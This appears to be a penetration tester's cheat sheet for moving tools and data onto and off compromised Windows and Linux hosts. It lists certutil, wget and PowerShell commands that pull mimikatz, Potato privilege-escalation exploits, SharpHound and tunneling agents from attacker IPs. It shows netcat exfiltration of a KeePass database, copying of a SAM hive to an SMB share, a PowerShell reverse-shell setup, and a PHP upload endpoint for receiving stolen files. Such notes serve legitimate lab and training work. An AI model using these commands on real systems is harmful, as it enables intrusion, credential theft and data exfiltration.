x

File Transfers & Shells

Note Windows Defender/some antivirus may be running if access is denied to transfer any files. Either that or some kind of permissions restriction.

Certutil

If PowerShell isn't available (have had more success with file transfers using PS) 

certutil -urlcache -split -f http://192.168.49.93:1337/Windows/winPEASx64.exe winpeas.exe

certutil -urlcache -split -f http://192.168.49.93:1337/Windows/mimikatz.exe mimikatz.exe

certutil -urlcache -split -f http://192.168.45.225:1337/Windows/nc.exe nc.exe

certutil -urlcache -split -f http://192.168.45.231:1337/Windows/JuicyPotato.exe JuicyPotato.exe

certutil -urlcache -split -f http://192.168.45.225:1337/Windows/powercat.ps1 powercat.ps1

certutil -urlcache -split -f http://192.168.49.93:1337/Windows/GodPotato-NET4.exe GodPotato-NET4.exe

certutil -urlcache -split -f http://192.168.45.159:1337/Windows/SigmaPotato.exe SigmaPotato.exe

certutil -urlcache -split -f http://192.168.49.53:1337/Windows/adPEAS.ps1 adPEAS.ps1

certutil -urlcache -split -f http://192.168.45.191:1337/Windows/chisel.exe chisel.exe

certutil -urlcache -split -f http://192.168.49.53:1337/Windows/PrivescCheck.ps1 privesccheck.ps1

certutil -urlcache -split -f http://192.168.45.215:1337/Windows/powerup.ps1 powerup.ps1

certutil -urlcache -split -f http://10.10.14.12:1337/Windows/Certify/Certify.exe certify.exe

certutil -urlcache -split -f http://192.168.49.93:1337/Windows/PowerView.ps1 powerview.ps1

certutil -urlcache -split -f http://10.150.71.20:1337/Windows/ListDlls/Listdlls64.exe ListDLLs.exe

Wget

wget http://192.168.45.159:1337/Windows/winPEASx64.exe -o winpeas.exe

wget http://10.8.0.2:1337/Windows/winpeas.ps1 -o winpeas.ps1

wget http://10.8.0.2:1337/Windows/mimikatz.exe -o mimikatz.exe

wget http://192.168.49.53:1337/Windows/Procmon64.exe -o Procmon64.exe

wget http://10.8.0.2:1337/Windows/Invoke-Mimikatz.ps1 -o Invoke-Mimikatz.ps1

wget http://192.168.49.93:1337/Windows/nc.exe -o nc.exe

wget http://192.168.45.247:1337/Windows/socatx64.exe -o socatx64.exe

wget http://192.168.45.239:1337/Windows/chisel.exe -o chisel.exe

wget http://192.168.45.241:1337/Windows/FullPowers.exe -o FullPowers.exe

wget http://192.168.49.53:1337/Windows/Seatbelt.exe -o Seatbelt.exe

wget http://10.8.0.2:1337/Windows/GodPotato-NET4.exe -O GodPotato-NET4.exe

wget http://192.168.45.247:1337/Windows/RoguePotato.exe -O RoguePotato.exe

wget http://192.168.45.225:1337/Windows/PrintSpoofer64.exe -O PrintSpoofer64.exe

wget http://192.168.45.247:1337/Windows/SigmaPotato.exe -O SigmaPotato.exe

wget http://192.168.45.247:1234/Windows/pingsweep.ps1 -O pingsweep.ps1

wget http://192.168.45.247:1337/Windows/Procmon64a.exe -o Procmon64a.exe

wget http://192.168.45.247:1337/Windows/Procmon.exe -o Procmon.exe

wget http://192.168.45.247:1337/Windows/Procmon64.exe -o Procmon64.exe

wget http://192.168.45.247:1337/Windows/exploit.ps1 -o exploit.ps1

wget http://192.168.45.247:1337/Windows/exploit.exe -o exploit.exe

wget http://192.168.45.247:1337/Windows/function.ps1 -o function.ps1

Enumeration scripts 

wget http://192.168.45.215:1337/Windows/powerup.ps1 -o powerup.ps1

wget http://192.168.45.229:1337/Windows/PrivescCheck.ps1 -o privesccheck.ps1

wget http://192.168.45.196:1337/Windows/beRoot.exe -o beroot.exe

wget http://10.10.11.51:1337/Windows/PowerView.ps1 -o powerview.ps1

wget http://192.168.49.53:1337/Windows/SharpHound.ps1 -o sharphound.ps1

wget http://192.168.49.53:1337/Windows/SharpHound.exe -o sharphound.exe

wget http://10.8.0.2:1337/Windows/PSTools/PsExec.exe -o PsExec.exe

wget http://10.8.0.2:1337/Windows/RawCopy/RawCopy64.exe -o RawCopy64.exe

wget http://192.168.45.196:1337/Windows/SharpGPOAbuse.zip -o sharpgpoabuse.zip

wget http://192.168.45.196:1337/Windows/SharpGPOAbuse.exe -o sharpgpoabuse.exe

Ligolo proxy (Windows) 

wget http://192.168.49.93:1337/Windows/proxy -o proxy.exe

Ligolo agent (Linux) 

wget http://192.168.49.93:1337/Linux/agent -o agent

Ligolo agent (Windows) 

wget http://192.168.49.93:1337/Windows/agent2.exe -o agent2.exe

Ligolo proxy (Linux) 

wget http://192.168.45.174:1337/Linux/proxy2 -o proxy2

**PowerShell

(new-object System.Net.WebClient).DownloadFile('http://192.168.119.138:1337/Windows/chisel.exe','C:\Windows\Temp\chisel.exe')

IWR

Invoke-WebRequest -Uri http://10.10.93.141:1337/Windows/winPEASx64.exe -OutFile winpeas.exe

Impacket-Smbserver

Use copy or xcopy. Lots of targets' policies will require a username and password for mounting a share. 

impacket-smbserver -smb2support -user user -password pass shared .

net use Z: \\192.168.45.225\shared /user:user pass

New-PSDrive -Name "SharedFolder" -PSProvider "FileSystem" -Root "\\<ip>\<folder_name>"

cd SharedFolder:

Copy-Item -Path "SAM.hive" -Destination "Z:\"

nc.exe
This is a really great, less complex alternative to the SMB server if you cannot mount the SMB share for one reason or another 

root@kali:~# nc -lnvp 4444 > CEH.kdbx
C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx

Powershell revshell

wget http://192.168.45.218:1337/Linux/Invoke-PowerShellTcp.ps1 -o Invoke-PowerShellTcp.ps1

echo "Invoke-PowerShellTcp -Reverse -IpAddress <IP> -Port <PORT> >> Invoke-PowerShellTcp.ps1"

powershell -c

PHP Shell File Upload Using Apache

cat upload.php
chmod +x upload.php

<?php
$uploaddir = '/var/www/uploads/';

$uploadfile = $uploaddir . $_FILES['file']['name'];

move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

sudo mkdir /var/www/uploads

mv upload.php /var/www/uploads

service apache2 start
ps -ef | grep apache

powershell (New-Object System.Net.WebClient).UploadFile('http://<your Kali ip>/upload.php', '<file you want to transfer>')

service apache2 stop
Left-click: follow link, Right-click: select node, Scroll: zoom
x